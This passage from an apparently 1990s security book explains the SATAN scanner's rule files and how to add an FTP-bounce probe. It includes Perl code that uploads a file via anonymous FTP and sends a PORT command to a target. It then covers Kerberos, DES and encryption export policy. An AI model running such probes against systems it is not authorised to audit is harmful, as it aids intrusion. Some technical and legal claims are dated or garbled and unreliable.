This entry indicates that if a SATAN record includes the text runs rexd, a new SATAN fact isadded (assert) to the facts file: this fact says that the $target that has a runs rexd entry (as aresult of the rpc.satan scan) is vulnerable.

The remaining entries in the default SATAN facts file look for old sendmail versions,old ftpd versions, and the existence of a modem on a TCP port.

A recent problem with telnetd programs from various manufacturers permitted remote users topass environment variables, such as shared library information, to the telnetd. If this problemcould be detected by the banner given by a vendor’s telnetd, this vulnerability could bedetected by adding an entry into this facts file. Unfortunately, most vendors do not put version

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information into the telnetd banner, but as an example imagine that vendor XYZ include anRCS string of Then, an entry such as this might be reasonable:

/XYZ m2 V5R4$target|assert|a|uw|ANY@$target|ANY@ANY|Telnetd access|telnetd is vulnerable

This is making further assumptions about the problem that may or may not be accurate; theexample is just for illustration of the process.

hosttypeThe hosttype file provides rules that allow SATAN to recognize host types based on the bannersreturned from telnetd, ftpd, and sendmail.

The file consists of a major section (CLASS class_name) that is just used for reporting,followed by the real rules. Each rule is another PERL condition, which is used to try to matchagainst fact records, and the hosttype, which is the conclusion that results if the PERL condi-tion evaluates to true.

Looking at the Ultrix CLASS of the satan-1.1.1/rules/hosttype, three rules are used to identifyvarious versions of Ultrix:

CLASS Ultrix/ultrix[\/v ]+([.0-9]+[A-Z]*)/i “Ultrix $1”/ultrix version 4/i && length(HOSTTYPE) <= 6 “Ultrix 4”UNKNOWN && /ultrix/i “Ultrix”

Notice that version information can be extracted from the match using the standard PERLmatching parameters. In the first case, the $1 corresponds to the information that matches tothose parts inside the ().

servicesThe services file classifies hosts by services, to make reports more suitable for reading. The file isbroken into two parts: SERVERS and CLIENTS. Each rule consists of a PERL matchingcondition that has access to the facts database and can reference each part of a fact using thevariable names such as $service or $text. If that rule evaluates to true, the second field isassumed to be provided (if under SERVER) or used (if under CLIENT). A third field canspecify a hostname; if not specified, SATAN assumes that the $target of the current fact recordis the hostname.

Here is an example from the satan-1.1.1/rules/services file:

/offers gopher/ Gopher/offers http/ WWW

Notice that this services file is used by SATAN when generating a Results screen or a report.The output from the conclusions drawn by these rules is not stored in any file.

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todoThe todo file specifies probes to try based on existing facts. Each rule consists of a condition,once again a PERL matching statement, a target to probe, the tool to use in the probe, and anyarguments needed for that tool.

Here is an example from the satan-1.1.1/rules/todo file:

$service eq “ypserv” $target “ypbind.satan”$service eq “rexd” $target “rex.satan”

The rules indicate that if the $service field of a record in the SATAN facts database is either“ypserv” or “rexd”, SATAN should run either “ypbind.satan” or “rex.satan” against the $targetindicated in that record.

This file can be used for expansion of SATAN. If, for example, a user would find a vulnerabil-ity against the echo service, the user could create an echo.satan tool and add an entry such asthis:

$service eq “echo” $target “echo.satan”

trustThe trust file contains rules that are used by SATAN to classify hosts on the basis of trust. Thefirst field is a PERL matching condition that is applied against each fact record, whereas thesecond field is the conclusion drawn if the first field evaluates to true.

Here is an example from the satan-1.1.1/rules/trust file:

$text =˜ / mounts \S+/ NFS export/serves nis domain/ NIS client

The first entry indicates that if the $text field of a fact contains the word mounts followed by astring, this system is exporting NFS file systems. The second entry indicates that if the factcontains the text serves nis domain, this system trusts NIS clients.

Extending SATANA new probe can be added to SATAN by creating a new .satan tool and putting it into the bin/directory. Then the tool name must be explicitly added to the file under a scan level.The tool can be conditionally invoked using the rulesets, if so desired, as discussed previously,by added it to the using a trailing ?. Finally, ruleset changes can be added, if so desired,and new documentation describing the vulnerability and how to deal with it is a worthwhileaddition.

You might extend SATAN to search for the FTP server bounce problem described earlier inthis chapter. The goal of ftpbounce.satan is to see if the remote ftpd server permits a client to

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specify any remote client IP address and TCP port to receive a file transfer. If the remote ftpdpermits a PORT command with an IP address that is different from the originating source,and a TCP port that is reserved, the ftpd is open to this problem.

The quickest way to make ftpbounce.satan is to copy ftp.satan to ftpbounce.satan and makeappropriate modifications. (Each .satan tool must output fact records, and using the existingapproach from current .satan tools makes this quite easy.) Here is a clip from ftp.satan:

open(FTP, “$FTP -nv <<EOFopen $targetquote user anonymousquote pass -satan\@cd /put /etc/group $$.foodele $$.fooquitEOF |”) || die “cannot run $FTP”;while(<FTP>) { if (defined($opt_v)) { print; } if (/^230/) {

This just needs to be modified to look for a 200 reply to an attempt to send a PORT com-mand, as shown in this clip:

open(FTP, “$FTP -nv <<EOFopen $targetquote user ftpquote pass -satan\@quote port 1,2,3,4,0,25quitEOF |”) || die “cannot run $FTP”;while(<FTP>) { if (defined($opt_v)) { print; } if (/^200 PORT command successful/) { $status = “a”; $severity = “x”; $trustee = “”; $trusted = “”; $service_output = “BOUNCE”; $text = “offers ftp server bounce”;

Now the ftpbounce.satan script is ready to be listed in the heavy scan listing in At thispoint, an HTML document describing the fix (“Get the patch from a vendor, or the latestwu-ftpd”) should be added into the links available on the tutorials Web page. Lastly, theftpbounce.satan tool and the new Web pages should be sent to the creators of SATAN forinclusion into new versions of the program. (Send the changes to [emailprotected].)

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The tool does not have to be written in PERL. It can be written in any language as long ittakes an argument specifying the target name and emits records that comply to the factsdatabase format. It is possible to use hybrid tools, and SATAN does this: many of the .satantools are written in PERL but call compiled programs, such as nfs-chk (which is written in C).

Long-Term Benefits of Using SATANSATAN can be a worthwhile tool for security administrators in managing the security of anetwork of systems that are maintained by a distributed group of owners. SATAN can be usedto assist security administrators in enforcing company policies, such as preventing unrestrictedNFS exports or X server access. The reality of most organizations involves the fact that it isdifficult to enforce such software policies without regular auditing. SATAN can be used to dosuch auditing remotely. SATAN also provides a convenient framework for the addition of newnetwork vulnerability scans.

Works CitedAlighieri, Dante. Inferno. Norton Anthology of World Masterpieces, Volume 1, 4th Edition.W.W. Norton & Company, New York, 1979.

Belgers, Walter. “Unix Password Security,” available from; INTERNET.

Bellovin, Steven M. “Security Problems in the TCP/IP Protocol Suite,” 1993, available from; INTERNET.

Farmer, Dan and Wietse Venema. “Improving the Security of Your Site by Breaking Into It,”1993, available from; INTERNET.

Fisher, John. “CIAC Bulletin G-4: X Authentication Vulnerability,” 1995, available from; INTERNET.

Carl Landwehr et al., “A Taxonomy of Computer Program Security Flaws, with Examples,”Naval Research Laboratory, NRL/FR/5542—93-9591, 1993.

Leopold, George. “Infowar: Can bits really replace bullets?” EE Times, Nov 6, 1995.

Schuba, Christopher and Eugene Spafford. “Addressing Weaknesses in the Domain NameSystem Protocol,” 1993, available from; INTERNET.

U.S. Department of Defense, Trusted Computer System Evaluation Criteria, 1985a, availablefrom; INTERNET.

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9conventional time-sharing system requires a prospective

user to provide an identity, and to authenticate that

identity before using its services. A network that

connects prospective clients with services has a corre-

sponding need to identify and authenticate its clients.

One approach is for the service to trust the authentica-

tion performed by the client system. The Unix network

applications lpr and rcp, for example, trust the user’s

workstation to reliably authenticate its clients.

Unfortunately, a workstation is under the complete

control of its user. The user can replace the operating

system, or even replace the machine itself. A secure

network service cannot rely on the integrity of the

workstation to perform a reliable authentication.


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Kerberos is a network authentication system developed at MIT to address this problem. Itenables users communicating over networks to prove their identity to each other whileoptionally preventing eavesdropping or replay attacks. It provides data secrecy using encryp-tion. Kerberos provides real-time authentication in an insecure distributed environment.

Note Kerberos is a North American technology; because of export restrictions it is notavailable outside of North America. To solve the same problems and to provideEuropean companies with a compatible product, another project has been started inEurope. Their product is called SESAME, and is fully compatible with KerberosVersion 5.

How Kerberos WorksThe Kerberos model is based on a trusted third-party authentication protocol. The originaldesign and implementation of Kerberos was the work of MIT Project Athena staff members.Kerberos is publicly available and has seen wide use.

Kerberos works by providing users or services with “tickets” that they can use to identifythemselves, and secret, cryptographic keys for secure communication with network resources.A ticket, which is a sequence of a few hundred bytes, can be embedded in virtually anynetwork protocol. This enables the processes implementing that protocol to be sure about theidentity of the principals involved. Although most implementations of Kerberos use TCP/IP,some implementations use other protocols.

Practically speaking, Kerberos usually is used in application-level protocols, such as Telnet orFTP, to provide user-to-host security. Data stream mechanisms, such as SOCK_STREAM orRPC, can also use it as the implicit authentication system. At a lower level, Kerberos also canbe used for host-to-host security in protocols such as IP, UDP, or TCP—although suchimplementations are rare.

Kerberos is only a part of a security implementation. A full security implementation requiresauthentication, assurance, security policy, and documentation. Kerberos provides services inthe first two areas:

■ It provides mutual authentication and secure communication between principals on anopen network.

■ It manufactures secret keys for any requester and provides a mechanism for these secretkeys to be safely propagated through the network.

Using Kerberos on time-sharing machines greatly weakens its protections. A user’s tickets areonly as secure as the “root” account. Dumb terminals and most X terminals do not understandthe Kerberos protocol. Using Kerberos to authenticate to the local workstation is easilycircumvented.

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In a Kerberos system, a designated site on the network, called the Kerberos authentication server,performs centralized key management and administrative functions. The server maintains adatabase that contains all users’ secret keys. It generates session keys whenever two users wantto communicate securely and authenticates the identity of a user who requests secured networkservices.

Like other secret-key systems, Kerberos requires trust in a third party—the Kerberos authenti-cation server in this case. If the server is compromised, the integrity of the whole system fails.

The Kerberos NetworkKerberos divides the network into security domains, called realms. Each realm has its ownauthentication server, and implements its own security policy. This allows organizationsimplementing Kerberos to have different levels of security for different information classeswithin the organization. A realm can accept authentications from other realms or not acceptthem without a re-authentication if the information security policy requires re-authentication.

Realms are hierarchical. That is, each realm may have child realms, and each realm may havea parent. This structure allows realms that have no direct contact to share authenticationinformation. If an organization has a corporate-wide user naming policy, for example, it ispossible for a user authenticating in one Kerberos realm to connect to a computer in anotherrealm without requiring re-authentication. This is true even if logically there is no directconnection between the two realms. Specifically, if an organization ABC.COM has installedKerberos, it may have created departmental realms PAYROLL and RESEARCH (see fig. 9.1).If a user authenticates to the realm RESEARCH.ABC.COM and wants to use informationfrom PAYROLL.ABC.COM, there is no need to re-authenticate. The user identity is passedbetween the realms by way of the parent realm ABC.COM. Because both realms are part ofthe same organization, they can trust each other.



Accounting Payroll OperationsResearchProduction


Figure 9.1Kerberos realm hierarchy.

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On the other hand, if a user authenticates to DEF.COM and wants to use information fromRESEARCH.ABC.COM, Kerberos can require the user to re-authenticate to an authentica-tion server within ABC.COM before sharing information. Because Kerberos provides secureauthentication and encryption, this communication can take place securely over the Internet, apublic, hostile network. If the two companies want to accept each other’s authentication, thetwo root Kerberos servers ABC.COM and DEF.COM need to share an encryption key.Because the Kerberos naming convention supports Internet domain names, a Kerberos user atDEF.COM can authenticate as a user to ABC.COM even if the two Kerberoses cannotdirectly share authentications.

RFCsAn RFC is a request for comment. This is a mechanism used to distribute ideas for standardsin the internetworking industry. The RFC describes the protocol or standard the issuer wouldlike to see adopted. Earlier versions of Kerberos were not described in RFCs. RFC 1510,however, describes version 5 of Kerberos.

RFC 1510This document gives an overview and specification of version 5 of the protocol for theKerberos network authentication system. It is available from the following:

Much of the information in this chapter is based on RFC 1510, and some portions are directlyextracted from the RFC.

Goals of KerberosThe design of Kerberos has goals in three areas: authentication, authorization, and accounting.In addition, any function that benefits from the secure distribution of encryption keys willbenefit.

There is much discussion in the security industry of how particular systems fit into thegovernment-trusted host classification system. Kerberos by itself does not fit into the trustclassifications because it does not offer a full security environment. It can, however, be used asa component when building a secure network. Kerberos provides an authentication mechanismand encryption tools that can be used to implement a secure networking environment.

AuthenticationAny user can make a claim to an ID. The authentication process tests this claim. During basicauthentication, the user is asked to provide a password. During enhanced authentication, theuser is asked to use a piece of hardware (a token) assigned to the legitimate owner of that ID.

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Alternatively, the user can be asked to provide biometric measurements (thumbprints, voice-prints, or retinal scans) to authenticate the claim to that ID.

Kerberos’ goal is to remove authentication from the insecure workstation to a centralizedauthentication server. This authentication server can be physically secured, and can be con-trolled to ensure its reliability. This ensures that all users within a Kerberos realm have beenauthenticated to the same standard or policy.

AuthorizationAfter a user has been authenticated, the application or network service can administrateauthorization. It looks at the requested resource or application function and verifies that theowner of the ID has permission to use the resource or perform the application function.

Kerberos’ goal is to provide a trusted authentication of the ID on which a system can base itsauthorizations.

AccountingThe goal of accounting is to support quotas charged against the client (to limit consumption)and/or charges based on consumption. In addition, accounting audits users’ activities to ensurethat responsibility for an action can be traced to the initiator of the action. Auditing, forexample, can trace the originator of an invoice back to the individual who entered it into thesystem.

Security of the accounting and auditing system is important. If an intruder is able to modifyaccounting and auditing information, it is no longer possible to ensure that a user is respon-sible for his/her actions.

The goal of Kerberos is to permit attachment of an integrated, secure, reliable accountingsystem.

How Authentication WorksKerberos performs authentication as a trusted third-party authentication service using sharedsecret key cryptography.

The authentication process proceeds as follows:

1. A client sends a request to the authentication server, requesting “credentials” for a givenapplication server (see fig. 9.2 [Message 1]).

These credentials can be directly for an application server or for a Ticket Granting Server.

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2. The authentication server responds with these credentials, encrypted in the client’s key(see fig. 9.2 [Message 2]).

The credentials consist of the following:

■ A “ticket” for the server.

■ A temporary encryption key (called a session key).

3. If the ticket is for a Ticket Granting Server, the client then requests a ticket for theapplication server from the Ticket Granting Server (see fig. 9.2 [Message 3]).

4. The Ticket Granting Server replies with a ticket for the application server (see fig. 9.2[Message 4]).

5. The client transmits the ticket (which contains the client’s identity and a copy of thesession key, all encrypted in the server’s key) to the application server (see fig. 9.2[Message 5]).

6. The session key, now shared by the client and application server, is used to authenticatethe client, and can be used to authenticate the server (see fig. 9.2 [Message 6]).

It also can be used to encrypt further communication between the two parties or toexchange a separate subsession key to encrypt further communication.

Figure 9.2Kerberos authentication


An implementation consists of one or more authentication servers running on physically securehosts. Each authentication server maintains a database of principals (that is, users and servers)and their secret keys. Code libraries on the server provide encryption and implement theKerberos protocol. Before a typical network can add authentication to its transactions, it adds


Kerberosticket grantingserver



1 2 3




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calls to the Kerberos library, which results in the transmission of the necessary messages toachieve authentication.

A client can use two methods for asking a Kerberos server for credentials.

■ Client sends a cleartext request for a ticket for the desired function server to the functionserver. The reply is sent encrypted in the client’s secret key. Usually, this request is for aTicket Granting Ticket that can be used later with the Ticket Granting Server.

■ Client sends a request to the Ticket Granting Server in the same manner as whencontacting any other application server that requires Kerberos credentials. The reply isencrypted in the session key from the Ticket Granting Ticket.

After credentials are obtained, they can be used to establish the level of security the applicationrequests:

■ Verify the identity of the principals in a transaction

■ Ensure the integrity of messages exchanged between them

■ Preserve privacy of the messages

The application can choose whatever level of protection it deems necessary. The level ofsecurity chosen for a particular transaction depends upon the security policy being imple-mented by the application.

To verify the identities of the principals in a transaction, the client transmits the ticket to thefunction server. The ticket is sent in cleartext (cleartext is readable by anyone who chooses tolook at the message). Parts of it are encrypted, but this encryption doesn’t thwart replay. Anattacker could intercept it and reuse it. So, additional information accompanies the message toprove it originated at the principal to whom the ticket was issued. This information, called anauthenticator, is encrypted in the session key, and includes a timestamp. The timestamp provesthat the message was generated recently and is not a replay. Encrypting the authenticator in thesession key proves that a party possessing the session key generated it. Because no one exceptthe requesting principal and the server know the session key (it never travels over the networkin the clear), this guarantees the identity of the client.

The integrity of the messages exchanged between principals can be guaranteed using thesession key. This approach provides detection both of replay attacks and message streammodification attacks, by generating and transmitting a collision-proof checksum called a hashor digest of the client’s message, keyed with the session key. Checksums are discussed later inthis chapter.

Privacy and integrity of the messages exchanged between principals can be secured by using thesession key passed in the ticket and contained in the credentials to encrypt the data to bepassed.

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Authentication exchanges require read-only access to the Kerberos database. Sometimesthe entries in the database must be modified, however, such as when adding new principalsor changing a principal’s key. Modification of entries is done using a protocol between aclient and a third Kerberos server, the Kerberos Administration Server. The administrationprotocol is not described here. Another protocol concerns maintaining multiple copies ofthe Kerberos database, but it’s an implementation detail and can vary to support differentdatabase technologies.

What Kerberos Doesn’t DoKerberos doesn’t solve denial of service attacks. These protocols have places in which anintruder can prevent an application from participating in the proper authentication steps.Detection and solution of such attacks, some of which can appear to be common failure modesfor the system, usually is best left to the human administrators and users.

Principals must keep their secret keys secret. If an intruder somehow steals a principal’s key,the villain can masquerade as that principal or impersonate any server to the legitimateprincipal.

Kerberos doesn’t solve password-guessing attacks. If a user chooses a poor password, anattacker can successfully mount an off-line dictionary attack. The attacker attempts to decryptrepeatedly, employing successive entries from a dictionary, messages encrypted under a keyderived from the user’s password.

Kerberos is also vulnerable to clock synchronization attacks. Each host on the network musthave a clock “loosely synchronized” to the time of the other hosts. This synchronization servesto reduce the bookkeeping needs of application servers when they perform replay detection.The degree of “looseness” can be configured per server. If the clocks are synchronized over thenetwork, the clock synchronization protocol must itself be secured from network attackers.

Principal identifiers should not be recycled. A typical mode of access control uses AccessControl Lists to grant permissions to particular principals. An Access Control List is attachedto any object that requires restricted access. The list should consist only of principal identifiers,although group identifiers are ususally allowed. When a user wants to make use of the object,the operating system checks the Access Control List. If the user is listed as an authorizedprincipal, access is granted. If a stale list entry remains for a deleted principal and the principalidentifier is reused, the new principal inherits rights specified in the stale entry. Not reusingprincipal identifiers erases the danger of inadvertent access. Kerberos does not at this timecoordinate or manage Access Control Lists. This entire problem is refered to as object reuse.Any system that wants to be governemt security certified must control object reuse and preventit from occurring.

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EncryptionKerberos uses encryption to protect information passing over the network. Encryption is thetransformation of data into a form no one can read without the key, for the purpose ofensuring privacy by keeping the information hidden from anyone for whom it is not intended,even if they can see the encrypted data.

An encryption system is a set of rules or operations to be applied to the message. The rulesrequire a randomizing seed or starting point, called a key. The original message is calledplaintext. The disguised message is called ciphertext.

Note Encryption is a procedure to convert plaintext into ciphertext, and decryption is aprocedure to convert ciphertext into plaintext.

Encryption systems can be patented. Many encryption systems have been patented, includingDES and RSA. The basic ideas of public-key encryption are contained in U.S. Patent4,200,770, by M. Hellman, W. Diffie, and R. Merkle, issued 4/29/80 and in U.S. Patent4,218,582, by M. Hellman and R. Merkle, issued 8/19/80. Similar patents have been issuedthroughout the world. Public Key Partners, of Sunnyvale, California holds exclusive licensingrights to both patents, as well as the rights to the RSA patent.

The encryption systems in use in Kerberos and most publicly available encryption systems(such as PGP) are patented. Any commercial implementation of Kerberos will be subject to thelicense granted for the encryption system.

NSA or other intelligence or defense agencies have intervened to block some patent applica-tions for encryption systems, under the authority of the Invention Secrecy Act of 1940 and theNational Security Act of 1947.

The NSA is the U.S. government’s official communications security body. The NSA has amandate to listen to and decode all foreign communications of interest to the security of theUnited States. The NSA is the largest employer of mathematicians and the largest purchaser ofcomputer hardware in the world. The NSA probably possesses encryption expertise many yearsahead of the public state of the art, and undoubtedly can break many of the systems used inpractice. For reasons of national security, almost all information about the NSA is classified. Italso has used its power to slow the spread of publicly available encryption, to prevent nationalenemies from employing methods too strong for the NSA to break.

As the premier cryptographic government agency, the NSA has enormous financial andcomputer resources. Developments in encryption achieved at the NSA are not made public.This secrecy has led to many rumors about the NSA’s capability to break popular crypto-systems like DES and that the NSA secretly has placed weaknesses, called trapdoors, in DES.These rumors have never been proved or disproved, and the criteria the NSA uses to selectencryption standards never have been made public.

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The NSA exerts influence over commercial cryptography in several ways. First, it controls theexport of cryptography from the U.S. The NSA generally does not approve export of productsused for encryption unless the key size is strictly limited. It does, however, approve for exportany products used for authentication only, no matter how large the key size, as long as theproduct cannot be converted to be used for encryption. The NSA also has blocked encryptionmethods from being published or patented, citing a national security threat. Additionally, theNSA serves an advisory role to NIST (National Institute of Standards and Technology, adivision of the U.S. Department of Commerce) in the evaluation and selection of official U.S.government computer security standards. In this capacity, it has played a prominent role in theselection of DES. The NSA also can exert market pressure on U.S. companies to produce (orrefrain from producing) encryption products, because the NSA itself often is a major customerfor these same companies.

The governments of Canada and the United States have synchronized their policies on exportof encryption. As a result, any distribution of encryption that is legal within the U.S. is alsolegal into Canada. Canadians wanting to export encryption to a third country must go throughthe same applications for an export license with the Canadian government.

Private, Public, Secret, or Shared Key EncryptionThere is a wide range of terminology in use for only two concepts. Here are the concepts:

■ Secret. An algorithm that depends on a key that must remain private is a secret keysystem. Kerberos uses DES, which is a secret key system, to encrypt information. BecauseKerberos shares the secret key among a small group of principals, it is often referred to asa shared secret key system.

■ Public. An algorithm that permits a key to be published is called a public key system.PGP uses RSA, which is a public key encryption system.

If a system depends on a secret key, the intention clearly is to prevent usage by anyone wholacks the key. Any message encrypted with a secret key may only be decrypted by the holder ofthe secret key.

A public key system is actually a dual key system. Each key consists of two parts, a secret partheld by a single individual, and a public part that may be published to the world. Anyone withthe public key may encrypt a message to the holder of the private key, and be confident thatonly one individual has access to the message. In the other direction, the holder of the privatepart may encrypt a message and send it to the world. Anyone who decrypts the message withthe public part of the key can be confident that the message could only have originated fromone individual. By combining the two systems and double encrypting a message, it is possibleto send a message to a single individual and provide the recipient with confidence that themessage could only have originated from one person.

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The primary advantage of public-key cryptography is increased security. The private keys donot need to be transmitted or revealed to anyone. In a secret-key system, by contrast, thepotential always exists for an enemy to discover the secret key during transmission.

A disadvantage of using public-key cryptography for encryption is speed. Certain popularsecret-key encryption methods are significantly faster than any currently available public-keyencryption methods.

With recent advances in the speed of computer hardware, the trade-off between speed andsecurity is leaning toward the public key-based systems. Although Kerberos can be imple-mented with a public key encryption system, the option to encrypt all data between principalsleaves the potential for very large amounts of encryption to take place. It is only when you planto encrypt large volumes of data that a shared secret key system starts to become the betterchoice. With this in mind, Kerberos has been designed to handle the problem of securedistribution of secret keys.

Private or Secret Key EncryptionA secret-key encryption system consists of an encryption function and a decryption function.The encryption function uses the key to generate a mapping of the plaintext into theciphertext. In the reverse, the decryption system takes the same key to generate a mapping ofthe ciphertext back into the plaintext. Such systems, in which the same key value is used toencrypt and decrypt, also are known as symmetric cryptosystems.

Although many secret key encryption systems are around, the most well-known system is DES.

DES and Its VariationsOriginally developed by IBM, DES stands for Data Encryption Standard, an encryption blockcipher. The U.S. government defined and endorsed it in 1977 as an official standard. Thedetails can be found in the official FIPS (Federal Information Processing Standards) publica-tion. DES has been studied extensively over the past 18 years and is the most well-known andwidely used encryption system in the world.

DES is a secret-key, symmetric cryptosystem. When DES is used for communication, thesender and receiver both must know the same secret key, because it’s used to encrypt anddecrypt the message. DES was designed to be implemented in hardware operates relatively fast(compared to other encryption systems) on 64-bit blocks with a 56-bit key. It works well forbulk encryption, that is, for encrypting a large set of data.

DES has been recertified as an official U.S. government encryption standard every five years.The government last recertified DES in 1993, but has indicated that it might not recertify itagain.

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As far as is known, DES never has been broken with a practical attack, despite the efforts ofmany researchers over many years. The obvious method of attack is a brute-force exhaustivesearch of the key space. This takes 255 steps on average. Early on, someone suggested that arich and powerful enemy could build a special-purpose computer capable of breaking DES byexhaustive search in a reasonable amount of time. Wiener estimated the cost of a specializedcomputer to perform such an exhaustive search at one million dollars—a sum within thebudget of a moderate-sized corporation, or a special interest group. Martin Hellman latershowed a time-memory trade-off that provides improvement over exhaustive search if memoryspace is plentiful, after an exhaustive precomputation. These ideas have fostered doubts aboutthe security of DES. Accusations also flew that the NSA had intentionally weakened DES.

The consensus is that DES, used properly, is secure against all but the most powerful enemies.Triple encryption DES might be secure against anyone at all. Biham and Shamir have statedthat they consider DES secure.

When using DES, several practical considerations can affect the security of the encrypted data.One should change DES keys frequently, to prevent attacks that require sustained dataanalysis. In a communications context, the sender or receiver must find a secure way tocommunicate the DES key to the other.

DES can be used for encryption in several officially defined modes. The U.S. Department ofCommerce Federal Information Processing Standard 81, published in 1980, defines the fourstandard modes of operation (and numerous nonstandard ones, as well). Some are more securethan others. The four standard modes are as follows:

■ ECB (Electronic Codebook). Encrypts each 64-bit block of plaintext consecutivelyunder the same 56-bit DES key. This is the least secure method of implementing DES.

■ CBC (Cipher Block Chaining). Each 64-bit plaintext block is XORed with theprevious ciphertext block before being encrypted with the DES key. Thus, the encryp-tion of each block depends on previous blocks and the same 64-bit plaintext blockencrypts to different ciphertext, depending on its context in the overall message. CBCmode helps protect against certain attacks, although not against exhaustive search ordifferential cryptanalysis.

■ CFB (Cipher Feedback). Allows DES with block lengths less than 64 bits. It uses thepreviously generated cyphertext as input to DES to create a randomizer to combine withthe next block of plaintext. In practice, CBC is the most widely used mode of DES,specified in several standards, including Kerberos.

■ OFB (Output Feedback Mode). Is the same as CFB except it does not re-encrypt thecypherblock before using it as a randomizer. OFB is not as secure as CFB.

FIPS 46-1 (the federal standard defining DES) says, “The algorithm specified in this standardis to be implemented using hardware (not software) technology. Software implementations in

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general purpose computers are not in compliance with this standard.” Despite this, softwareimplementations abound, and are used by government agencies.

Encryption Export IssuesAll cryptographic products need export licenses from the State Department, acting underauthority of the International Traffic in Arms Regulation (ITAR). ITAR defines cryptographicdevices, including software, as munitions. The U.S. government has historically been reluctantto grant export licenses for encryption products it sees as stronger than a certain non-publiclyassigned level. Under current regulations, a vendor seeking to export a product using cryptog-raphy first submits a request to the State Department’s Defense Trade Control office. Exportjurisdiction then can be passed to the Department of Commerce, whose export proceduresgenerally are simple and efficient. If jurisdiction remains with the State Department, thenfurther (perhaps lengthy) review must occur before export can be approved or denied. TheNSA sometimes becomes directly involved at this point. The details of the export approvalprocess change frequently.

The NSA has de facto control over export of cryptographic products. The State Departmentdoes not grant licenses without NSA approval and routinely grants them whenever NSA doesapprove. Therefore, policy decisions concerning exporting cryptography ultimately rest withthe NSA.

The NSA’s stated policy is not to restrict export of cryptography for authentication. Itsconcern lies only with the use of cryptography for privacy. A vendor seeking to export aproduct for authentication is granted an export license only so long as it can demonstrate thatthe product cannot be easily modified for encryption. This is true even for very strong systems,such as RSA with large key sizes. Furthermore, the bureaucratic procedures are simpler forauthentication products than for privacy products. An authentication product needs NSA andState Department approval only once, whereas an encryption product could need approval forevery sale or every product revision.

The U.S. State Department and the NSA strictly regulates export of DES, in hardware orsoftware. The government rarely approves export of DES, although DES is widely availableoverseas. Software developers in many countries have produced DES products from thepublished specifications. These products are functionally compatible with U.S. products.Financial institutions and foreign subsidiaries of U.S. companies are exceptions.

Export policy currently is a matter of great controversy. Many software and hardware vendorsconsider current export regulations overly restrictive and burdensome. The Software PublishersAssociation (SPA), a software industry group, has recently been negotiating with the govern-ment to get export license restrictions eased. One agreement was reached that allows simplifiedprocedures for export of two bulk encryption ciphers, RC2 and RC4, when the key size islimited. Also, export policy is less restrictive for foreign subsidiaries and overseas offices of U.S.companies.

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In March 1992, the Computer Security and Privacy Advisory Board voted unanimously torecommend a national review of cryptography policy, including export policy. The Board is anofficial advisory board whose members are drawn from the government and the private sector.The Board stated that a public debate is the only way to reach a consensus policy to best satisfycompeting interests. National security and law enforcement agencies like restrictions oncryptography, especially for export, whereas other government agencies and private industrywant greater freedom for using and exporting cryptography. Export policy has traditionallybeen decided solely by agencies concerned with national security, without much input fromthose who want to encourage commerce in cryptography. U.S. export policy could undergosignificant changes in the next few years.

Note The legal status of encryption in many countries has been placed on the WorldWide Web. You can access it using the following URL:

In much of the civilized world, encryption is legal or at least tolerated. In some countries,however, such activities can land you before a firing squad! Check with the laws in yourcountry before you use any encryption product. Some countries in which encryption is illegalare Russia, France, Iran, and Iraq.

Encryption and Checksum SpecificationsThe Kerberos protocols described in the RFC are designed to use stream encryption ciphers,such as the Data Encryption Standard (DES), in conjunction with block chaining andchecksum methods. Encryption is used to prove the identities of the network entities partici-pating in message exchanges. The Key Distribution Center for each realm is trusted by allprincipals registered in that realm to store a secret key in confidence. Proof of knowledge ofthis secret key is used to verify the authenticity of a principal.

The Key Distribution Center uses the principal’s secret key (in the Authentication Serverexchange) or a shared session key (in the Ticket Granting Server exchange) to encrypt re-sponses to ticket requests. The capability to obtain the secret key or session key impliesknowing the appropriate keys and the identity of the Key Distribution Center. The capabilityof a principal to decrypt the Key Distribution Center response and present a ticket and aproperly formed authenticator (generated with the session key from the Key DistributionCenter response) to a service verifies the identity of the principal. Likewise, the capability ofthe service to extract the session key from the ticket and prove its knowledge thereof in aresponse verifies the identity of the service.

The Kerberos protocols generally assume that the encryption used is secure from cryptanalysis.Sometimes, though, the order of fields in the encrypted portions of messages is arranged to

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minimize the effects of poorly chosen keys. Choosing good keys still is important. If keys arederived from user-typed passwords, those passwords need to be chosen well to make bruteforce attacks more difficult. Poorly chosen keys still make easy targets for intruders.

The following sections specify the encryption and checksum mechanisms currently definedfor Kerberos and describe the encoding, chaining, and padding requirements for each. Forencryption methods, placing random information (often referred to as a confounder) at the startof the message is often a good idea. The requirements for a confounder are specified along witheach encryption mechanism.

Some encryption systems use a block-chaining method to improve the security characteristicsof the ciphertext. These chaining methods often don’t provide an integrity check upondecryption. Such systems (such as DES in Cipher Block Chaining mode) must be augmentedusing a checksum of the plaintext that can be verified at decryption and used to detect anytampering or damage. Such checksums should be good at detecting burst errors in the input. Ifany damage is detected, the decryption routine is expected to return an error indicating thefailure of an integrity check. Each encryption type is expected to provide and verify anappropriate checksum. The specification of each encryption method sets out its checksumrequirements.

Finally, if a key is to be derived from a user’s password, an algorithm for converting thepassword to a key of the appropriate type is required. The string-to-key function ideally shouldbe one-way and mapping should be different in different realms, because users registered inmore than one realm often use the same password in each. An attacker compromising theKerberos server in one realm should not be able to just obtain or derive the user’s key inanother realm.

Encryption SpecificationsThe following structure describes all encrypted messages. The encrypted field that appears inthe unencrypted part of messages is a sequence that consists of an encryption type, an optionalkey version number, and the ciphertext.

EncryptedData = { etype[0] INTEGER -- Encryption Type kvno[1] INTEGER OPTIONAL, cipher[2] BYTE STRING -- ciphertext }

■ etype. Identifies the encryption algorithm used to encrypt the cipher.

■ kvno. Contains the version number of the key under which data is encrypted. Presentin messages encrypted under long-lasting keys, such as principals’ secret keys. Used todetermine which key to use when a ticket is valid across a change in key, such as when auser changes his password.

■ cipher. Contains the encrypted field(s).

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The cipher field is generated by applying the specified encryption algorithm to data composedof the message and algorithm-specific inputs. Encryption mechanisms defined for use withKerberos must take sufficient measures to guarantee the integrity of the plaintext. Theprotections often can be enhanced by adding a checksum and a confounder.

The suggested format for the data to be encrypted includes a confounder, a checksum, theencoded plaintext, and any necessary padding. The msg-seq field contains the part of theprotocol message that is to be encrypted. The format for the data to be encrypted is describedin the following:

{ confounder[0] BYTE STRING(conf_length) OPTIONAL, check[1] BYTE STRING(checksum_length) OPTIONAL, msg-seq[2] MsgSequence, pad BYTE STRING(pad_length) OPTIONAL}

